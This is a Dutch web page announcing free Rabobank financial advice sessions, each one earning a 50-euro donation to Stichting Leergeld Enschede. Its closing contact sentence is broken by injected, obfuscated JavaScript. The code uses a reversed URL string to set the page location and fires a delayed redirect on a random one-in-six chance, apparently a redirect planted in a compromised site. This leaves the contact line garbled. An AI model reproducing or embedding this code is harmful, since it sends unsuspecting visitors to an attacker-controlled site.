Rabobank financiële adviesgesprekken

Dit jaar steunen we het goede doel Stichting Leergeld Enschede! Om het geldbedrag dat we aan het goede doel willen schenken te vergroten is er een extra actie opgezet in samenwerking met de Rabobank Enschede-Haaksbergen. De Rabobank biedt financiële adviesgesprekken aan voor het goede doel! Per gesprek zal de Rabobank 50 euro extra schenken aan Stichting Leergeld.

In deze gesprekken kunnen adviezen en informatie worden gegeven over verschillende onderwerpen. Dus heb jij vragen over bijvoorbeeld de invloed van je studieschuld op een hypotheekaanvraag, wil je een huis gaan kopen of verkopen, of wil je juist adviezen over beleggen? Grijp dan nu je kans en vraag een gesprek aan! Dit gesprek is geheel vrijblijvend en het is niet nodig om lid te zijn van de Rabobank. 

Heb jij zin om het goede doel te steunen en wil je hiernaast ook nog de kans grijpen om een nuttig en informatief gesprek te houden met een adviseur van de Rabobank? Meld je dan nu aan! Ook voor eventuele vragen kan je uiteraard contact met ons opnemen via toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:mstbenefietdiner@gmail.com” target=”_blank”>mstbenefietdiner@gmail.com.